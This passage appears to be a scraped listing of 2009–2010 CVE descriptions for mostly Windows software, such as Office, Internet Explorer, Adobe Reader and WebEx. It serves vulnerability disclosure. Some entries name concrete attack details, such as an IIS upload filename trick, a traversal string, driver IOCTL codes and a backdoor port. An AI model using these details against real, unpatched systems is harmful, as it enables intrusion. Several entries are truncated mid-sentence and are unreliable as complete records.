2.0.0.24 and SeaMonkey before 1.1.19 on Windows Vista, Windows Server 2008 R2, and Windows 7 allows remote SMTP, IMAP, and POP servers to cause a denial of service (heap memory corruption and application crash) or possibly execute arbitrary code via crafted data in a session that uses SSPI. [CVE-2010-0138] Buffer overflow in Cisco CiscoWorks Internetwork Performance Monitor (IPM) 2.6 and earlier on Windows, as distributed in CiscoWorks LAN Management Solution (LMS), allows remote attackers to execute arbitrary code via a malformed getProcessName CORBA General Inter-ORB Protocol (GIOP) request, related to a "third-party component," aka Bug ID CSCsv62350. [CVE-2010-0120] Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows allows remote attackers to execute arbitrary code via large size values in QCP audio content. [CVE-2010-0117] RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows do not properly handle dimensions during YUV420 transformations, which might allow remote attackers to execute arbitrary code via crafted MP4 content. [CVE-2010-0116] Integer overflow in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows might allow remote attackers to execute arbitrary code via a crafted QCP file that triggers a heap-based buffer overflow. [CVE-2010-0103] UsbCharger.dll in the Energizer DUO USB battery charger software contains a backdoor that is implemented through the Arucer.dll file in the %WINDIR%\system32 directory, which allows remote attackers to download arbitrary programs onto a Windows PC, and execute these programs, via a request to TCP port 7777. [CVE-2010-0045] Apple Safari before 4.0.5 on Windows does not properly validate external URL schemes, which allows remote attackers to open local files and execute arbitrary code via a crafted HTML document. [CVE-2010-0043] ImageIO in Apple Safari before 4.0.5 and iTunes before 9.1 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted TIFF image. [CVE-2010-0042] ImageIO in Apple Safari before 4.0.5 and iTunes before 9.1 on Windows does not ensure that memory access is associated with initialized memory, which allows remote attackers to obtain potentially sensitive information from process memory via a crafted TIFF image. [CVE-2010-0041] ImageIO in Apple Safari before 4.0.5 and iTunes before 9.1 on Windows does not ensure that memory access is associated with initialized memory, which allows remote attackers to obtain potentially sensitive information from process memory via a crafted BMP image. [CVE-2010-0040] Integer overflow in ColorSync in Apple Safari before 4.0.5 on Windows, and iTunes before 9.1, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an image with a crafted color profile that triggers a heap-based buffer overflow. [CVE-2010-0034] Stack-based buffer overflow in Microsoft Office PowerPoint 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "Office PowerPoint Viewer TextCharsAtom Record Stack Overflow Vulnerability." [CVE-2010-0033] Stack-based buffer overflow in Microsoft Office PowerPoint 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint Viewer TextBytesAtom Record Stack Overflow Vulnerability." [CVE-2010-0032] Use-after-free vulnerability in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "OEPlaceholderAtom Use After Free Vulnerability." [CVE-2010-0031] Array index error in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3, and PowerPoint in Office 2004 for Mac, allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint OEPlaceholderAtom 'placementId' Invalid Array Indexing Vulnerability." [CVE-2010-0030] Heap-based buffer overflow in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint LinkedSlideAtom Heap Overflow Vulnerability." [CVE-2010-0029] Buffer overflow in Microsoft Office PowerPoint 2002 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint File Path Handling Buffer Overflow Vulnerability." [CVE-2009-5092] Cross-site scripting (XSS) vulnerability in the management interface in Microsoft FAST ESP 5.1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4764] Adobe Reader 8.x and 9.x on Windows is able to execute EXE files that are embedded in a PDF document, which makes it easier for remote attackers to trick users into executing arbitrary code via a crafted document. [CVE-2009-4741] Unspecified vulnerability in the Extras Manager before 2.0.0.67 in Skype before 4.1.0.179 on Windows has unknown impact and attack vectors. [CVE-2009-4654] Stack-based buffer overflow in the dhost module in Novell eDirectory 8.8 SP5 for Windows allows remote authenticated users to execute arbitrary code via long sadminpwd and verifypwd parameters in a submit action to /dhost/httpstk. [CVE-2009-4653] Stack-based buffer overflow in the dhost module in Novell eDirectory 8.8 SP5 for Windows allows remote authenticated users to cause a denial of service (dhost.exe crash) and possibly execute arbitrary code via a long string to /dhost/modules?I:. [CVE-2009-4445] Microsoft Internet Information Services (IIS), when used in conjunction with unspecified third-party upload applications, allows remote attackers to create empty files with arbitrary extensions via a filename containing an initial extension followed by a : (colon) and a safe extension, as demonstrated by an upload of a .asp:.jpg file that results in creation of an empty .asp file, related to support for the NTFS Alternate Data Streams (ADS) filename syntax. NOTE: it could be argued that this is a vulnerability in the third-party product, not IIS, because the third-party product should be applying its extension restrictions to the portion of the filename before the colon. [CVE-2009-4444] Microsoft Internet Information Services (IIS) 5.x and 6.x uses only the portion of a filename before a [CVE-2009-4378] The IPMI dissector in Wireshark 1.2.0 through 1.2.4 on Windows allows remote attackers to cause a denial of service (crash) via a crafted packet, related to "formatting a date/time using strftime." [CVE-2009-4324] Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009. [CVE-2009-4186] Stack consumption vulnerability in Apple Safari 4.0.3 on Windows allows remote attackers to cause a denial of service (application crash) via a long URI value (aka url) in the Cascading Style Sheets (CSS) background property. [CVE-2009-4118] The StartServiceCtrlDispatcher function in the cvpnd service (cvpnd.exe) in Cisco VPN client for Windows before 5.0.06.0100 does not properly handle an ERROR_FAILED_SERVICE_CONTROLLER_CONNECT error, which allows local users to cause a denial of service (service crash and VPN connection loss) via a manual start of cvpnd.exe while the cvpnd service is running. [CVE-2009-4074] The XSS Filter in Microsoft Internet Explorer 8 allows remote attackers to leverage the "response-changing mechanism" to conduct cross-site scripting (XSS) attacks against web sites that have no inherent XSS vulnerabilities, related to the details of output encoding and improper modification of an HTML attribute, aka "XSS Filter Script Handling Vulnerability." [CVE-2009-4073] The printing functionality in Microsoft Internet Explorer 8 allows remote attackers to discover a local pathname, and possibly a local username, by reading the dc:title element of a PDF document that was generated from a local web page. [CVE-2009-3959] Integer overflow in the U3D implementation in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a malformed PDF document. [CVE-2009-3958] Multiple stack-based buffer overflows in the NOS Microsystems getPlus Helper ActiveX control before 1.6.2.49 in gp.ocx in the Download Manager in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, might allow remote attackers to execute arbitrary code via unspecified initialization parameters. [CVE-2009-3957] Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, might allow attackers to cause a denial of service (NULL pointer dereference) via unspecified vectors. [CVE-2009-3956] The default configuration of Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, does not enable the Enhanced Security feature, which has unspecified impact and attack vectors, related to a "script injection vulnerability," as demonstrated by Acrobat Forms Data Format (FDF) behavior that allows cross-site scripting (XSS) by user-assisted remote attackers. [CVE-2009-3955] Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted JPC_MS_RGN marker in the Jp2c stream of a JpxDecode encoded data stream, which triggers an integer sign extension that bypasses a sanity check, leading to memory corruption. [CVE-2009-3954] The 3D implementation in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, might allow attackers to execute arbitrary code via unspecified vectors, related to a "DLL-loading vulnerability." [CVE-2009-3953] The U3D implementation in Adobe Reader and Acrobat 9.x before 9.3, 8.x before 8.2 on Windows and Mac OS X, and 7.x before 7.1.4 allows remote attackers to execute arbitrary code via malformed U3D data in a PDF document, related to a CLODProgressiveMeshDeclaration "array boundary issue," a different vulnerability than CVE-2009-2994. [CVE-2009-3951] Unspecified vulnerability in the Flash Player ActiveX control in Adobe Flash Player before 10.0.42.34 and Adobe AIR before 1.5.3 on Windows allows remote attackers to obtain the names of local files via unknown vectors. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4820. [CVE-2009-3943] Microsoft Internet Explorer 6 through 6.0.2900.2180 and 7 through 7.0.6000.16711 allows remote attackers to cause a denial of service (application hang) via a JavaScript loop that configures the home page by using the setHomePage method and a DHTML behavior property. [CVE-2009-3936] Unspecified vulnerability in Citrix Online Plug-in for Windows 11.0.x before 11.0.150 and 11.x before 11.2, Online Plug-in for Mac before 11.0, Receiver for iPhone before 1.0.3, and ICA Java, Mac, UNIX, and Windows Clients for XenApp and XenDesktop allows remote attackers to impersonate the SSL/TLS server and bypass authentication via a crafted certificate, a different vulnerability than CVE-2009-3555. [CVE-2009-3902] Directory traversal vulnerability in Cherokee Web Server 0.5.4 and earlier for Windows allows remote attackers to read arbitrary files via a /\.. (slash backslash dot dot) in the URL. [CVE-2009-3885] Sun Java SE 5.0 before Update 22 and 6 before Update 17 on Windows allows remote attackers to cause a denial of service via a BMP file containing a link to a UNC share pathname for an International Color Consortium (ICC) profile file, probably a related issue to CVE-2007-2789, aka Bug Id 6632445. [CVE-2009-3883] Multiple unspecified vulnerabilities in the Windows Pluggable Look and Feel (PL&F) feature in the Swing implementation in Sun Java SE 5.0 before Update 22 and 6 before Update 17, and OpenJDK, have unknown impact and remote attack vectors, related to "information leaks in mutable variables," aka Bug Id 6657138. [CVE-2009-3864] The Java Update functionality in Java Runtime Environment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22 and JDK and JRE 6 before Update 17, when a non-English version of Windows is used, does not retrieve available new JRE versions, which allows remote attackers to leverage vulnerabilities in older releases of this software, aka Bug Id 6869694. [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload. [CVE-2009-3841] Unspecified vulnerability in HP Discovery & Dependency Mapping Inventory (DDMI) 2.5x, 7.5x, and 7.60 on Windows allows remote authenticated users to execute arbitrary code via unknown vectors. [CVE-2009-3832] Opera before 10.01 on Windows does not prevent use of Web fonts in rendering the product's own user interface, which allows remote attackers to spoof the address field via a crafted web site. [CVE-2009-3830] The download functionality in Team Services in Microsoft Office SharePoint Server 2007 12.0.0.4518 and 12.0.0.6219 allows remote attackers to read ASP.NET source code via pathnames in the SourceUrl and Source parameters to _layouts/download.aspx. [CVE-2009-3746] XScreenSaver in Sun Solaris 10, when the accessibility feature is enabled, allows physically proximate attackers to obtain sensitive information by reading popup windows, which are displayed even when the screen is locked, a different vulnerability than CVE-2009-1276 and CVE-2009-2711. [CVE-2009-3674] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3671. [CVE-2009-3673] Microsoft Internet Explorer 7 and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-3672] Microsoft Internet Explorer 6 and 7 does not properly handle objects in memory that (1) were not properly initialized or (2) are deleted, which allows remote attackers to execute arbitrary code via vectors involving a call to the getElementsByTagName method for the STYLE tag name, selection of the single element in the returned list, and a change to the outerHTML property of this element, related to Cascading Style Sheets (CSS) and mshtml.dll, aka "HTML Object Memory Corruption Vulnerability." NOTE: some of these details are obtained from third party information. NOTE: this issue was originally assigned CVE-2009-4054, but Microsoft assigned a duplicate identifier of CVE-2009-3672. CVE consumers should use this identifier instead of CVE-2009-4054. [CVE-2009-3671] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3674. [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue. [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges. [CVE-2009-3532] Multiple SQL injection vulnerabilities in login.asp (aka the login screen) in LogRover 2.3 and 2.3.3 on Windows allow remote attackers to execute arbitrary SQL commands via the (1) uname and (2) pword parameters. NOTE: some of these details are obtained from third party information. [CVE-2009-3524] Unspecified vulnerability in ashWsFtr.dll in avast! Home and Professional for Windows before 4.8.1356 has unknown impact and local attack vectors. [CVE-2009-3523] aavmKer4.sys in avast! Home and Professional for Windows before 4.8.1356 does not properly validate input to IOCTLs (1) 0xb2d6000c and (2) 0xb2d60034, which allows local users to gain privileges via IOCTL requests using crafted kernel addresses that trigger memory corruption, a different vulnerability than CVE-2008-1625. [CVE-2009-3522] Stack-based buffer overflow in aswMon2.sys in avast! Home and Professional for Windows 4.8.1351, and possibly other versions before 4.8.1356, allows local users to cause a denial of service (system crash) and possibly gain privileges via a crafted IOCTL request to IOCTL 0xb2c80018. [CVE-2009-3450] Multiple cross-site scripting (XSS) vulnerabilities in WebCoreModule.ashx in RADactive I-Load before 2008.2.5.0 allow remote attackers to inject arbitrary web script or HTML via parameters with names beginning with __ (underscore underscore) sequences, which are incompatible with an XSS protection mechanism provided by Microsoft ASP.NET. [CVE-2009-3384] Multiple unspecified vulnerabilities in WebKit in Apple Safari before 4.0.4 on Windows allow remote FTP servers to execute arbitrary code, cause a denial of service (application crash), or obtain sensitive information via a crafted directory listing in a reply. [CVE-2009-3344] Unspecified vulnerability in SAP Crystal Reports Server 2008 on Windows XP allows attackers to cause a denial of service (infinite loop) via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.3 through 8.11. NOTE: as of 20090917, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3275] Blocks/Common/Src/Configuration/Manageability/Adm/AdmContentBuilder.cs in Microsoft patterns & practices Enterprise Library (aka EntLib) allows context-dependent attackers to cause a denial of service (CPU consumption) via an input string composed of many \ (backslash) characters followed by a " (double quote), related to a certain regular expression, aka a "ReDoS" vulnerability. [CVE-2009-3270] Microsoft Internet Explorer 7 through 7.0.6000.16711 allows remote attackers to cause a denial of service (unusable browser) by calling the window.print function in a loop, aka a "printing DoS attack," possibly a related issue to CVE-2009-0821. [CVE-2009-3267] Microsoft Internet Explorer 6 through 6.0.2900.2180, and 7.0.6000.16711, allows remote attackers to cause a denial of service (CPU consumption) via an automatically submitted form containing a KEYGEN element, a related issue to CVE-2009-1828. [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/. [CVE-2009-3243] Unspecified vulnerability in the TLS dissector in Wireshark 1.2.0 and 1.2.1, when running on Windows, allows remote attackers to cause a denial of service (application crash) via unknown vectors related to TLS 1.2 conversations. [CVE-2009-3177] Unspecified vulnerability in Kaspersky Online Scanner 7.0 has unknown impact and attack vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.8, (1) "Kaspersky Online Antivirus Scanner 7.0 exploit (Linux)" and (2) "Kaspersky Online Antivirus Scanner 7.0 exploit (Windows)." NOTE: as of 20090909, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3135] Stack-based buffer overflow in Microsoft Office Word 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, Open XML File Format Converter for Mac, Office Word Viewer 2003 SP3, and Office Word Viewer allow remote attackers to execute arbitrary code via a Word document with a malformed File Information Block (FIB) structure, aka "Microsoft Office Word File Information Memory Corruption Vulnerability." [CVE-2009-3134] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3133] Microsoft Office Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via a spreadsheet containing a malformed object that triggers memory corruption, related to "loading Excel records," aka "Excel Document Parsing Memory Corruption Vulnerability." [CVE-2009-3132] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3131] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3130] Heap-based buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via a spreadsheet containing a malformed Binary File Format (aka BIFF) record that triggers memory corruption, aka "Excel Document Parsing Heap Overflow Vulnerability." [CVE-2009-3129] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3128] Microsoft Office Excel 2002 SP3 and 2003 SP3, and Office Excel Viewer 2003 SP3, does not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a spreadsheet with a malformed record object, aka "Excel SxView Memory Corruption Vulnerability." [CVE-2009-3127] Microsoft Office Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, Open XML File Format Converter for Mac, and Office Excel Viewer 2003 SP3 do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel Cache Memory Corruption Vulnerability." [CVE-2009-3099] Unspecified vulnerability in HP OpenView Operations Manager 8.1 on Windows Server 2003 SP2 allows remote attackers to have an unknown impact, related to a "Remote exploit," as demonstrated by a certain module in VulnDisco Pack Professional 8.11, a different vulnerability than CVE-2007-3872. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3098] Unspecified vulnerability in the Portal in HP Operations Dashboard 2.1 on Windows Server 2003 SP2 allows remote attackers to have an unknown impact, related to a "Remote exploit," as demonstrated by a certain module in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3097] Multiple unspecified vulnerabilities in HP Performance Insight 5.3 on Windows allow attackers to obtain sensitive information via unknown vectors, as demonstrated by certain modules in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3096] Multiple unspecified vulnerabilities in HP Performance Insight 5.3 allow remote attackers to have an unknown impact, related to (1) a "Remote exploit" on Windows platforms, and (2) a "Remote preauthentication exploit" on the Windows Server 2003 SP2 platform, as demonstrated by certain modules in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3089] IBM Tivoli Directory Server (TDS) 6.0 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via unspecified vectors, related to (1) the ibmslapd.exe daemon on Windows and (2) the ibmdiradm daemon in the administration server on Linux, as demonstrated by certain modules in VulnDisco Pack Professional 8.11, a different vulnerability than CVE-2006-0717. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3087] Unspecified vulnerability in nserver.exe in the server in IBM Lotus Domino 8.0 on Windows Server 2003 allows remote attackers to cause a denial of service (daemon crash) via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3032] Integer overflow in kvolefio.dll 8.5.0.8339 and 10.5.0.0 in the Autonomy KeyView Filter SDK, as used in IBM Lotus Notes 8.5, Symantec Mail Security for Microsoft Exchange 5.0.10 through 5.0.13, and other products, allows context-dependent attackers to execute arbitrary code via a crafted OLE document that triggers a heap-based buffer overflow. [CVE-2009-3023] Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 6.0 allows remote authenticated users to execute arbitrary code via a crafted NLST (NAME LIST) command that uses wildcards, leading to memory corruption, aka "IIS FTP Service RCE and DoS Vulnerability." [CVE-2009-3003] Microsoft Internet Explorer 6 through 8 allows remote attackers to spoof the address bar, via window.open with a relative URI, to show an arbitrary URL on the web site visited by the victim, as demonstrated by a visit to an attacker-controlled web page, which triggers a spoofed login form for the site containing that page. [CVE-2009-2987] Unspecified vulnerability in an ActiveX control in Adobe Reader and Acrobat 7.x before 7.1.4, 8.x before 8.1.7, and 9.x before 9.2 on Windows allows remote attackers to cause a denial of service via unknown vectors. [CVE-2009-2975] Mozilla Firefox 3.5.2 on Windows XP, in some situations possibly involving an incompletely configured protocol handler, does not properly implement setting the document.location property to a value specifying a protocol associated with an external application, which allows remote attackers to cause a denial of service (memory consumption) via vectors involving a series of function calls that set this property, as demonstrated by (1) the chromehtml: protocol and (2) the aim: protocol. [CVE-2009-2954] Microsoft Internet Explorer 6.0.2900.2180 and earlier allows remote attackers to cause a denial of service (CPU consumption and application hang) via JavaScript code with a long string value for the hash property (aka location.hash), a related issue to CVE-2008-5715. [CVE-2009-2880] Buffer overflow in atrpui.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted WebEx Recording Format (WRF) file. [CVE-2009-2879] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2876 and CVE-2009-2878. [CVE-2009-2878] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2876 and CVE-2009-2879. [CVE-2009-2877] Stack-based buffer overflow in ataudio.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file. [CVE-2009-2876] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2878 and CVE-2009-2879. [CVE-2009-2875] Buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted WebEx Recording Format (WRF) file. [CVE-2009-2838] Integer overflow in QuickLook in Apple Mac OS X 10.5.8 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted Microsoft Office document that triggers a buffer overflow. [CVE-2009-2813] Samba 3.4 before 3.4.2, 3.3 before 3.3.8, 3.2 before 3.2.15, and 3.0.12 through 3.0.36, as used in the SMB subsystem in Apple Mac OS X 10.5.8 when Windows File Sharing is enabled, Fedora 11, and other operating systems, does not properly handle errors in resolving pathnames, which allows remote authenticated users to bypass intended sharing restrictions, and read, create, or modify files, in certain circumstances involving user accounts that lack home directories. [CVE-2009-2804] Integer overflow in ColorSync in Apple Mac OS X 10.4.11 and 10.5.8, and Safari before 4.0.4 on Windows, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted ColorSync profile embedded in an image, leading to a heap-based buffer overflow. [CVE-2009-2794] The Exchange Support component in Apple iPhone OS before 3.1, and iPhone OS before 3.1.1 for iPod touch, does not properly implement the "Maximum inactivity time lock" functionality, which allows local users to bypass intended Microsoft Exchange restrictions by choosing a large Require Passcode time value. [CVE-2009-2761] Unquoted Windows search path vulnerability in the scheduler (sched.exe) in Avira AntiVir, AntiVir Premium, Premium Security Suite, and AntiVir Professional might allow local users to gain privileges via a malicious antivir.exe file in the "C:\Program Files\avira\" directory. [CVE-2009-2717] The Abstract Window Toolkit (AWT) implementation in Sun Java SE 6 before Update 15 on Windows 2000 Professional does not provide a Security Warning Icon, which makes it easier for context-dependent attackers to trick a user into interacting unsafely with an untrusted applet. [CVE-2009-2711] XScreenSaver in Sun Solaris 9 and 10, OpenSolaris before snv_120, and X11 6.4.1 for Solaris 8, when the Xorg or Xnewt server is used, allows physically proximate attackers to obtain sensitive information by reading popup windows, which are displayed even when the screen is locked, a different vulnerability than CVE-2009-1276. [CVE-2009-2688] Multiple integer overflows in glyphs-eimage.c in XEmacs 21.4.22, when running on Windows, allow remote attackers to cause a denial of service (crash) or execute arbitrary code via (1) the tiff_instantiate function processing a crafted TIFF file, (2) the png_instantiate function processing a crafted PNG file, and (3) the jpeg_instantiate function processing a crafted JPEG file, all which trigger a heap-based buffer overflow. NOTE: the provenance of this information is unknown [CVE-2009-2681] Unspecified vulnerability in HP ProCurve Identity Driven Manager (IDM) A.02.x through A.02.03 and A.03.x through A.03.00, on Windows Server 2003 with IAS and Windows Server 2008 with NPS, allows local users to gain privileges via unknown vectors. [CVE-2009-2668] Microsoft Internet Explorer 6 through 6.0.2900.2180 and 7 through 7.0.6000.16473 allows remote attackers to cause a denial of service (CPU consumption) via an XML document composed of a long series of start-tags with no corresponding end-tags, a related issue to CVE-2009-1232. [CVE-2009-2628] The VMnc media codec in vmnc.dll in VMware Movie Decoder before 6.5.3 build 185404, VMware Workstation 6.5.x before 6.5.3 build 185404, VMware Player 2.5.x before 2.5.3 build 185404, and VMware ACE 2.5.x before 2.5.3 build 185404 on Windows does not properly handle certain small heights in video content, which might allow remote attackers to execute arbitrary code via a crafted AVI file that triggers heap memory corruption. [CVE-2009-2576] Microsoft Internet Explorer 6.0.2900.2180 and earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a long Unicode string argument to the write method, a related issue to CVE-2009-2479. NOTE: it was later reported that 7.0.6000.16473 and earlier are also affected. [CVE-2009-2536] Microsoft Internet Explorer 5 through 8 allows remote attackers to cause a denial of service (memory consumption and application crash) via a large integer value for the length property of a Select object, a related issue to CVE-2009-1692. [CVE-2009-2531] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-2530. [CVE-2009-2530] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-2531. [CVE-2009-2529] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, 7, and 8 does not properly handle argument validation for unspecified variables, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "HTML Component Handling Vulnerability." [CVE-2009-2528] GDI+ in Microsoft Office XP SP3 does not properly handle malformed objects in Office Art Property Tables, which allows remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption, aka "Memory Corruption Vulnerability." [CVE-2009-2521] Stack consumption vulnerability in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 7.0 allows remote authenticated users to cause a denial of service (daemon crash) via a list (ls) -R command containing a wildcard that references a subdirectory, followed by a .. (dot dot), aka "IIS FTP Service DoS Vulnerability." [CVE-2009-2518] Integer overflow in GDI+ in Microsoft Office XP SP3 allows remote attackers to execute arbitrary code via an Office document with a bitmap (aka BMP) image that triggers memory corruption, aka "Office BMP Integer Overflow Vulnerability." [CVE-2009-2512] The Web Services on Devices API (WSDAPI) in Windows 